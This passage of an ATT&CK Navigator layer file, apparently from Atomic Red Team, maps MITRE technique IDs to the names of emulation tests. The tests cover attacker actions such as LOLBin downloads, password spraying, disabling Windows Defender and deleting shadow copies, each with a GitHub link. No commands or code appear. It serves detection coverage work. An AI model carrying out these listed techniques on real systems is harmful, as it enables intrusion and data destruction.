(verifyctl)\n- Windows - BITSAdmin BITS Download\n- Windows - PowerShell Download\n- OSTAP Worming Activity\n- svchost writing a file to a UNC path\n- Download a File with Windows Defender MpCmdRun.exe\n- File Download via PowerShell\n- File download with finger.exe on Windows\n- Download a file with IMEWDBLD.exe\n- Curl Download File\n- Curl Upload File\n- Download a file with Microsoft Connection Manager Auto-Download\n- MAZE Propagation Script\n- Printer Migration Command-Line Tool UNC share folder into a zip file\n- Lolbas replace.exe use to copy file\n- Lolbas replace.exe use to copy UNC file\n- certreq download\n- Download a file using wscript\n- Nimgrab - Transfer Files\n- iwr or Invoke Web-Request download\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1106","score":5,"enabled":true,"comment":"\n- Execution through API - CreateProcess\n- WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique\n- WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique\n- Run Shellcode via Syscall in Go\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1106/T1106.md"}]},{"techniqueID":"T1110","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":3,"enabled":true,"comment":"\n- Brute Force Credentials of single Active Directory domain users via SMB\n- Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos)\n- Password Brute User using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.002","score":1,"enabled":true,"comment":"\n- Password Cracking with Hashcat\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.002/T1110.002.md"}]},{"techniqueID":"T1110.003","score":6,"enabled":true,"comment":"\n- Password Spray all Domain Users\n- Password Spray (DomainPasswordSpray)\n- Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos)\n- WinPwn - DomainPasswordSpray Attacks\n- Password Spray Invoke-DomainPasswordSpray Light\n- Password Spray using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1110.004","score":1,"enabled":true,"comment":"\n- Brute Force:Credential Stuffing using Kerbrute Tool\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":68,"enabled":true,"comment":"\n- Modify Registry of Current User Profile - cmd\n- Modify Registry of Local Machine - cmd\n- Modify registry to store logon credentials\n- Add domain to Trusted sites Zone\n- Javascript in registry\n- Change Powershell Execution Policy to Bypass\n- BlackByte Ransomware Registry Changes - CMD\n- BlackByte Ransomware Registry Changes - Powershell\n- Disable Windows Registry Tool\n- Disable Windows CMD application\n- Disable Windows Task Manager application\n- Disable Windows Notification Center\n- Disable Windows Shutdown Button\n- Disable Windows LogOff Button\n- Disable Windows Change Password Feature\n- Disable Windows Lock Workstation Feature\n- Activate Windows NoDesktop Group Policy Feature\n- Activate Windows NoRun Group Policy Feature\n- Activate Windows NoFind Group Policy Feature\n- Activate Windows NoControlPanel Group Policy Feature\n- Activate Windows NoFileMenu Group Policy Feature\n- Activate Windows NoClose Group Policy Feature\n- Activate Windows NoSetTaskbar Group Policy Feature\n- Activate Windows NoTrayContextMenu Group Policy Feature\n- Activate Windows NoPropertiesMyDocuments Group Policy Feature\n- Hide Windows Clock Group Policy Feature\n- Windows HideSCAHealth Group Policy Feature\n- Windows HideSCANetwork Group Policy Feature\n- Windows HideSCAPower Group Policy Feature\n- Windows HideSCAVolume Group Policy Feature\n- Windows Modify Show Compress Color And Info Tip Registry\n- Windows Powershell Logging Disabled\n- Windows Add Registry Value to Load Service in Safe Mode without Network\n- Windows Add Registry Value to Load Service in Safe Mode with Network\n- Disable Windows Toast Notifications\n- Disable Windows Security Center Notifications\n- Suppress Win Defender Notifications\n- Allow RDP Remote Assistance Feature\n- NetWire RAT Registry Key Creation\n- Ursnif Malware Registry Key Creation\n- Terminal Server Client Connection History Cleared\n- Disable Windows Error Reporting Settings\n- DisallowRun Execution Of Certain Applications\n- Enabling Restricted Admin Mode via Command_Prompt\n- Mimic Ransomware - Enable Multiple User Sessions\n- Mimic Ransomware - Allow Multiple RDP Sessions per User\n- Event Viewer Registry Modification - Redirection URL\n- Event Viewer Registry Modification - Redirection Program\n- Enabling Remote Desktop Protocol via Remote Registry\n- Disable Win Defender Notification\n- Disable Windows OS Auto Update\n- Disable Windows Auto Reboot for current logon user\n- Windows Auto Update Option to Notify before download\n- Do Not Connect To Win Update\n- Tamper Win Defender Protection\n- Snake Malware Registry Blob\n- Allow Simultaneous Download Registry\n- Modify Internet Zone Protocol Defaults in Current User Registry - cmd\n- Modify Internet Zone Protocol Defaults in Current User Registry - PowerShell\n- Activities To Disable Secondary Authentication Detected By Modified Registry Value.\n- Activities To Disable Microsoft [FIDO Aka Fast IDentity Online] Authentication Detected By Modified Registry Value.\n- Scarab Ransomware Defense Evasion Activities\n- Disable Remote Desktop Anti-Alias Setting Through Registry\n- Disable Remote Desktop Security Settings Through Registry\n- Disabling ShowUI Settings of Windows Error Reporting (WER)\n- Enable Proxy Settings\n- Set-Up Proxy Server\n- RDP Authentication Level Override\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":2,"enabled":true,"comment":"\n- Windows Screencapture\n- Windows Screen Capture (CopyFromScreen)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"comment":"\n- Email Collection with PowerShell Get-Inbox\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1115","score":3,"enabled":true,"comment":"\n- Utilize Clipboard to store or execute commands from\n- Execute Commands from Clipboard using PowerShell\n- Collect Clipboard Data via VBA\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"comment":"\n- Automated Collection Command Prompt\n- Automated Collection PowerShell\n- Recon information for export with PowerShell\n- Recon information for export with Command Prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"comment":"\n- Win32_PnPEntity Hardware Inventory\n- WinPwn - printercheck\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":2,"enabled":true,"comment":"\n- using device audio capture commandlet\n- Registry artefact when application use microphone\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":4,"enabled":true,"comment":"\n- System Time Discovery\n- System Time Discovery - PowerShell\n- System Time Discovery W32tm as a Delay\n- System Time with Windows time Command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"comment":"\n- Registry artefact when application use webcam\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}],"comment":"\n- Lolbin Jsc.exe compile javascript to exe\n- Lolbin Jsc.exe compile javascript to dll\n"},{"techniqueID":"T1127.001","score":2,"enabled":true,"comment":"\n- MSBuild Bypass Using Inline Tasks (C#)\n- MSBuild Bypass Using Inline Tasks (VB)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1129","score":1,"enabled":true,"comment":"\n- ESXi - Install a custom VIB on an ESXi host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1129/T1129.md"}]},{"techniqueID":"T1132","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":1,"enabled":true,"comment":"\n- XOR Encoded data.\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"comment":"\n- Running Chrome VPN Extensions via the Registry 2 vpn extension\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"comment":"\n- Named pipe client impersonation\n- `SeDebugPrivilege` token duplication\n- Launch NSudo Executable\n- Bad Potato\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"comment":"\n- Access Token Manipulation\n- WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"comment":"\n- Parent PID Spoofing using PowerShell\n- Parent PID Spoofing - Spawn from Current Process\n- Parent PID Spoofing - Spawn from Specified Process\n- Parent PID Spoofing - Spawn from svchost.exe\n- Parent PID Spoofing - Spawn from New Process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"comment":"\n- Injection SID-History with mimikatz\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":7,"enabled":true,"comment":"\n- Network Share Discovery command prompt\n- Network Share Discovery PowerShell\n- View available share drives\n- Share Discovery with PowerView\n- PowerView ShareFinder\n- WinPwn - shareenumeration\n- Network Share Discovery via dir command\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":4,"enabled":true,"comment":"\n- Create a new user in a command prompt\n- Create a new user in PowerShell\n- Create a new Windows admin user\n- Create a new Windows admin user via .NET\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"comment":"\n- Create a new Windows domain admin user\n- Create a new account similar to ANONYMOUS LOGON\n- Create a new Domain Account using PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}],"comment":"\n- Office Application Startup - Outlook as a C2\n"},{"techniqueID":"T1137.002","score":1,"enabled":true,"comment":"\n- Office Application Startup Test Persistence (HKCU)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"comment":"\n- Install Outlook Home Page Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"comment":"\n- Code Executed Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Excel Add-in File (XLL)\n- Persistent Code Execution Via Word Add-in File (WLL)\n- Persistent Code Execution Via Excel VBA Add-in File (XLAM)\n- Persistent Code Execution Via PowerPoint VBA Add-in File (PPAM)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":2,"enabled":true,"comment":"\n- Deobfuscate/Decode Files Or Information\n- Certutil Rename and Decode\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":5,"enabled":true,"comment":"\n- Chrome/Chromium (Developer Mode)\n- Chrome/Chromium (Chrome Web Store)\n- Firefox\n- Edge Chromium Addon - VPN\n- Google Chrome Load Unpacked Extension With Command Line\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"comment":"\n- PetitPotam\n- WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"comment":"\n- Octopus Scanner Malware Open Source Supply Chain\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"comment":"\n- Bitsadmin Download (cmd)\n- Bitsadmin Download (PowerShell)\n- Persist, Download, & Execute\n- Bits download using desktopimgdownldr.exe (cmd)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":5,"enabled":true,"comment":"\n- Examine local password policy - Windows\n- Examine domain password policy - Windows\n- Get-DomainPolicy with PowerView\n- Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy\n- Use of SecEdit.exe to export the local security policy (including the password policy)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"comment":"\n- Indirect Command Execution - pcalua.exe\n- Indirect Command Execution - forfiles.exe\n- Indirect Command Execution - conhost.exe\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"comment":"\n- OSTap Style Macro Execution\n- OSTap Payload Download\n- Maldoc choice flags command execution\n- OSTAP JS version\n- Office launching .bat file from AppData\n- Excel 4 Macro\n- Headless Chrome code execution via VBA\n- Potentially Unwanted Applications (PUA)\n- Office Generic Payload Download\n- LNK Payload Download\n- Mirror Blast Emulation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1204.003","score":1,"enabled":true,"comment":"\n- Malicious Execution from Mounted ISO Image\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.003/T1204.003.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"comment":"\n- DCShadow (Active Directory)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}],"comment":"\n- SyncAppvPublishingServer Signed Script PowerShell Command Execution\n- manage-bde.wsf Signed Script Command Execution\n"},{"techniqueID":"T1216.001","score":1,"enabled":true,"comment":"\n- PubPrn.vbs Signed Script Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":4,"enabled":true,"comment":"\n- List Google Chrome / Opera Bookmarks on Windows with powershell\n- List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt\n- List Mozilla Firefox bookmarks on Windows with command prompt\n- List Internet Explorer Bookmarks using the command prompt\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":77,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}],"comment":"\n- mavinject - Inject DLL into running process\n- Register-CimProvider - Execute evil dll\n- InfDefaultInstall.exe .inf Execution\n- ProtocolHandler.exe Downloaded a Suspicious File\n- Microsoft.Workflow.Compiler.exe Payload Execution\n- Renamed Microsoft.Workflow.Compiler.exe Payload Executions\n- Invoke-ATHRemoteFXvGPUDisablementCommand base test\n- DiskShadow Command Execution\n- Load Arbitrary DLL via Wuauclt (Windows Update Client)\n- Lolbin Gpscript logon option\n- Lolbin Gpscript startup option\n- Lolbas ie4uinit.exe use as proxy\n- LOLBAS CustomShellHost to Spawn Process\n- Provlaunch.exe Executes Arbitrary Command via Registry Key\n- LOLBAS Msedge to Spawn Process\n"},{"techniqueID":"T1218.001","score":8,"enabled":true,"comment":"\n- Compiled HTML Help Local Payload\n- Compiled HTML Help Remote Payload\n- Invoke CHM with default Shortcut Command Execution\n- Invoke CHM with InfoTech Storage Protocol Handler\n- Invoke CHM Simulate Double click\n- Invoke CHM with Script Engine and Help Topic\n- Invoke CHM Shortcut Command with ITS and Help Topic\n- Decompile Local CHM File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"comment":"\n- Control Panel Items\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"comment":"\n- CMSTP Executing Remote Scriptlet\n- CMSTP Executing UAC Bypass\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"comment":"\n- CheckIfInstallable method call\n- InstallHelper method call\n- InstallUtil class constructor method call\n- InstallUtil Install method call\n- InstallUtil Uninstall method call - /U variant\n- InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant\n- InstallUtil HelpText method call\n- InstallUtil evasive invocation\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"comment":"\n- Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject\n- Mshta executes VBScript to execute malicious command\n- Mshta Executes Remote HTML Application (HTA)\n- Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement\n- Invoke HTML Application - Jscript Engine Simulating Double Click\n- Invoke HTML Application - Direct download from URI\n- Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler\n- Invoke HTML Application - JScript Engine with Inline Protocol Handler\n- Invoke HTML Application - Simulate Lateral Movement over UNC Path\n- Mshta used to Execute PowerShell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"comment":"\n- Msiexec.exe - Execute Local MSI file with embedded JScript\n- Msiexec.exe - Execute Local MSI file with embedded VBScript\n- Msiexec.exe - Execute Local MSI file with an embedded DLL\n- Msiexec.exe - Execute Local MSI file with an embedded EXE\n- WMI Win32_Product Class - Execute Local MSI file with embedded JScript\n- WMI Win32_Product Class - Execute Local MSI file with embedded VBScript\n- WMI Win32_Product Class - Execute Local MSI file with an embedded DLL\n- WMI Win32_Product Class - Execute Local MSI file with an embedded EXE\n- Msiexec.exe - Execute the DllRegisterServer function of a DLL\n- Msiexec.exe - Execute the DllUnregisterServer function of a DLL\n- Msiexec.exe - Execute Remote MSI file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"comment":"\n- Odbcconf.exe - Execute Arbitrary DLL\n- Odbcconf.exe - Load Response File\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"comment":"\n- Regasm Uninstall Method Call Test\n- Regsvcs Uninstall Method Call Test\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"comment":"\n- Regsvr32 local COM scriptlet execution\n- Regsvr32 remote COM scriptlet execution\n- Regsvr32 local DLL execution\n- Regsvr32 Registering Non DLL\n- Regsvr32 Silent DLL Install Call DllRegisterServer\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"comment":"\n- Rundll32 execute JavaScript Remote Payload With GetObject\n- Rundll32 execute VBscript command\n- Rundll32 execute VBscript command using Ordinal number\n- Rundll32 advpack.dll Execution\n- Rundll32 ieadvpack.dll Execution\n- Rundll32 syssetup.dll Execution\n- Rundll32 setupapi.dll Execution\n- Execution of HTA and VBS Files using Rundll32 and URL.dll\n- Launches an executable using Rundll32 and pcwutl.dll\n- Execution of non-dll using rundll32.exe\n- Rundll32 with Ordinal Value\n- Rundll32 with Control_RunDLL\n- Rundll32 with desk.cpl\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"comment":"\n- TeamViewer Files Detected Test on Windows\n- AnyDesk Files Detected Test on Windows\n- LogMeIn Files Detected Test on Windows\n- GoToAssist Files Detected Test on Windows\n- ScreenConnect Application Download and Install on Windows\n- Ammyy Admin Software Execution\n- RemotePC Software Execution\n- NetSupport - RAT Execution\n- UltraViewer - RAT Execution\n- UltraVNC Execution\n- MSP360 Connect Execution\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"comment":"\n- MSXSL Bypass using local files\n- MSXSL Bypass using remote files\n- WMIC bypass using local XSL file\n- WMIC bypass using remote XSL file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"comment":"\n- WINWORD Remote Template Injection\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"comment":"\n- Take ownership using takeown utility\n- cacls - Grant permission to specified user or group recursively\n- attrib - Remove read-only attribute\n- attrib - hide file\n- Grant Full Access to folder for Everyone - Ryuk Ransomware Style\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"comment":"\n- Windows - Discover domain trusts with dsquery\n- Windows - Discover domain trusts with nltest\n- Powershell enumerate domains and forests\n- Adfind - Enumerate Active Directory OUs\n- Adfind - Enumerate Active Directory Trusts\n- Get-DomainTrust with PowerView\n- Get-ForestTrust with PowerView\n- TruffleSnout - Listing AD Infrastructure\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"comment":"\n- LockBit Black - Modify Group policy settings -cmd\n- LockBit Black - Modify Group policy settings -Powershell\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1485","score":2,"enabled":true,"comment":"\n- Windows - Overwrite file with SysInternals SDelete\n- Overwrite deleted data on C drive\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":3,"enabled":true,"comment":"\n- PureLocker Ransom Note\n- Data Encrypted with GPG4Win\n- Data Encrypt Using DiskCryptor\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"comment":"\n- Windows - Stop service using Service Controller\n- Windows - Stop service using net.exe\n- Windows - Stop service by killing process\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":11,"enabled":true,"comment":"\n- Windows - Delete Volume Shadow Copies\n- Windows - Delete Volume Shadow Copies via WMI\n- Windows - wbadmin Delete Windows Backup Catalog\n- Windows - Disable Windows Recovery Console Repair\n- Windows - Delete Volume Shadow Copies via WMI with PowerShell\n- Windows - Delete Backup Files\n- Windows - wbadmin Delete systemstatebackup\n- Windows - Disable the SR scheduled task\n- Disable System Restore Through Registry\n- Windows - vssadmin Resize Shadowstorage Volume\n- Modify VSS Service Permissions\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"comment":"\n- Replace Desktop Wallpaper\n- Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1497","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":2,"enabled":true,"comment":"\n- Detect Virtualization Environment (Windows)\n- Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"comment":"\n- Install MS Exchange Transport Agent Persistence\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"comment":"\n- Web Shell Written to Disk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"comment":"\n- Install IIS Module using AppCmd.exe\n- Install IIS Module using PowerShell Cmdlet New-WebGlobalModule\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":2,"enabled":true,"comment":"\n- Simulate Patching termsrv.dll\n- Modify Terminal Services DLL Path\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}],"comment":"\n- Find and Display Internet Explorer Browser Version\n- Applications Installed\n- WinPwn - Dotnetsearch\n- WinPwn - DotNet\n- WinPwn - powerSQL\n"},{"techniqueID":"T1518.001","score":7,"enabled":true,"comment":"\n- Security Software Discovery\n- Security Software Discovery - powershell\n- Security Software Discovery - Sysmon Service\n- Security Software Discovery - AV Discovery via WMI\n- Security Software Discovery - AV Discovery via Get-CimInstance and Get-WmiObject cmdlets\n- Security Software Discovery - Windows Defender Enumeration\n- Security Software Discovery - Windows Firewall 